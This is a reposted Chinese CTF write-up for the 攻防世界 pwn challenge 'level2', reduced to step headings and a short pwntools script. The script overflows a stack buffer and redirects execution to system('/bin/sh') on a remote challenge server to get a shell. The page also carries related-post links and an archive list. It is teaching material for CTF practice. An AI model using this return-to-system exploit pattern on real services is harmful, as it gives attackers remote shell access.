攻防世界—pwn—level2

其他 2020-04-04 11:34:09 阅读次数: 0

题目分析

题目提示

下载文件后首先使用checksec检查文件保护机制

使用ida打开，查看伪代码

搜索字符串发现/bash/sh

信息收集

偏移量

system的地址

/bin/sh的地址

编写脚本

from pwn import *
p = remote('111.198.29.45',50136)
#p = process("./pwn003")
binsh = 0x0804A024
system = 0x8048320
payload = "A"*0x88+"B"*0x4+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()

本地测试

靶机测试

猜你喜欢

转载自www.cnblogs.com/anweilx/p/12628491.html

攻防世界—pwn—level2

攻防世界 | level2

攻防世界level2 x_64位

python世界level2

(Jarvis Oj)(Pwn) level2

[Jarvis OJ - PWN]——[XMAN]level2

攻防世界_pwn_level2(萌新版)

攻防世界—pwn—level0

攻防世界PWN题 level3

攻防世界(pwn) level3

Jarvis Oj Pwn 学习笔记-level2

(Jarvis Oj)(Pwn) level2(x64)

CTF PWN [XMAN]level2(x64)

[Jarvis OJ - PWN]——[XMAN]level2(x64)

攻防世界-wp-PWN-新手区-2-level2

攻防世界—pwn—cgpwn2

[XMAN]level2

JarvisOJ——level2

level2

攻防世界 pwn welpwn

攻防世界 pwn string

18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)

攻防世界level0 + (Jarvis Oj)(Pwn) level1

【python challenge】Level2

jarvis oj level2

攻防世界_pwn_cgpwn2(萌新版)

攻防世界—pwn—hello_pwn

攻防世界PWN题 pwn-100

攻防世界 pwn100&&pwn200

攻防世界-PWN-hello_pwn

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)